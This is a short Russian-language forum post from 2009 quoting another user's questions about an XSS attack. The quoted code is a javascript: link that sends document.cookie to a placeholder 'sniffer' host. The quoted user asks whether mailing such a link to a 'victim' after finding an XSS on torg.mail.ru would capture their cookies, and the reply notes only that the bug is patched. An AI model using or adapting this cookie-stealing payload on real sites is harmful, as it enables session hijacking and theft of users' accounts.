20.05.2009, 16:11
|
|
Познающий
Регистрация: 08.05.2009
Сообщений: 39
Провел на форуме:
32852
Репутация:
20
|
|
Сообщение от LemoTTT
Давайте вы мне подробнее раскажете:
Вот код:
PHP код:
<a href="javascript:img=new Image();img.src='<img src=http://адрес_сниффера/s.gif?'+escape(document.cookie)+'>';">text</a>
Вопрос № 1:
PHP код:
javascript
Это зашифрованая ссылка на xss? или что?
Вопрос № 2:
Допустим если я как то найду xss на http://torg.mail.ru/
и потом пришлю вышеуказаную ссылку на почту (тоже мейл ру, а если другая почта?)жертве , она пр кн откроет, и все куки мои? Баг уже прикрыли))) Можешь не пытаться даже
|
|
|